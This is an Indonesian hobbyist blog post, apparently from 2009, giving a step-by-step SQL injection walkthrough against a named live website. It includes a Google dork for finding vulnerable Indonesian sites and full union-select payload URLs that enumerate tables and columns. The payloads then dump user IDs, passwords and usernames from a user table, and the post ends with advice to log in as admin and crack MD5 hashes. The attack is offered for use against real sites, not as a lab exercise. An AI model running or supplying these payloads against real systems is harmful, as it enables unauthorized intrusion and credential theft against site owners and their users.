kaya-nya udah lama ga posting tutorial, ngepost tentang tutorial lagi ah...
wokeh, beberapa posting sebelumnya saya pernah bahas tentang dasar2 sql injection...
sekarang dipostan saya kali ini bakal langsung peng-aplikasian-nya a.k.a TERJUN KE LAPANGAN! :D
NB : lebih baik sebelum baca yang ini liat dulu posting saya sebelum ini,yang ini:
http://diary-kuro.blogspot.com/2009/02/dasar-sql-injection-by-newbie.html
biar nyambung..hehe
yang udah, langsung aja...cari site indo aja ya? hoho...
okeh, kita cari dork digoogle-nya pake : "news_detail.php?id= site:id"
NB : tu kita pake "id" karena mo nyari site indo
*cari sana sini...cek sql injection atu2...akhirnya dapet*
http://www.m-wizard.biz/news_detail.php?id=3
next...cari batas jumlah table database sekaligus magic number-nya...
http://www.m-wizard.biz/news_detail.php?id=-3 union select 1,2,3,4--
dah dapet tu...enter dah!
hoho..angka yang keluar cuman 1, 1! :D
sekarang kita liat tabel2 yang ada didalam databasenya. caranya?
perintah yang sayah pake bwt ngluarin tabel adalah :
group_concat(table_name)
ama
from information_schema.tables where table_schema=database()
masukkan group_concat(table_name) pada magic number yang udah dikeluarin tadi (yang tadi kita dapet = 1)
dan from information_schema.tables where table_schema=database() ditaroh dibelakang
jadinya gini nih :
http://www.m-wizard.biz/news_detail.php?id=-3 union select group_concat(table_name),2,3,4 from information_schema.tables where table_schema=database()--
nah tu keliatan dah tu semua table yang ada di databasenya,disini yang kita cari table yang berisi user ma pass! (tujuan kita...hehe)
diantara table2 yang keluar disitu ada table user_t...(karena dicurigai memiliki data pass ma user! :D)
kita akan ngeluarin column yang ada didalam table user_t ini
sebelumnya kita konvert table user_t menjadi hexa dulu...hasilnya : 757365725F74
NB : buat konvert dari string ke hexa klik aja disini
lalu kita keluarin columnnya, caranya?
perintah yang sayah pake bwt ngeluarin column-nya adalah :
group_concat(column_name)
ama
from information_schema.columns where table_name=*HEXA DARI NAMA TABELNYA*
http://www.m-wizard.biz/news_detail.php?id=-3 union select group_concat(column_name),2,3,4 from information_schema.columns where table_name=0x757365725F74--
*HEXA DARI NAMA TABELNYA* disini udah diganti...jadi user_t yang tadi udah kita rubah dari bentuk user_t (string) jadi bentuk 757365725F74 (hexa)
nah..keliatan deh column yang ada di tabel user_t
langkah selanjutnya,kita keluarin deh data2 dari column user_id,user_password,user_name....hehe! caranya ganti column name jadi column2 yang udah muncul tadi, dan dibagian akhir kita ambil langsung ke nama tabel-nya (user_t) jadi gini:
http://www.m-wizard.biz/news_detail.php?id=-3 union select group_concat(user_id,0x3a,user_password,0x3a,user_name),2,3,4 from user_t--
woho...liat yang ada disitu! xixiixixix....
selanjutnya tinggal cari login admin-nya,,disini kita tinggal kira2 aja deh...dan login sebagai admin/webmaster disitu...dan kalo bentuk password-nya dlm bntuk md5 ya di-crack dulu... :D
thx to bang :
GOOGLE,incomp13te,Xshadow,indounderground,yadoy666,dll...(masi banyak) hehe..
Next Project : belajar tentang RFI (Remote File Inclusion), doain yak...:D
2 komentar:
cemen kaya tai lw
cemen lw
Posting Komentar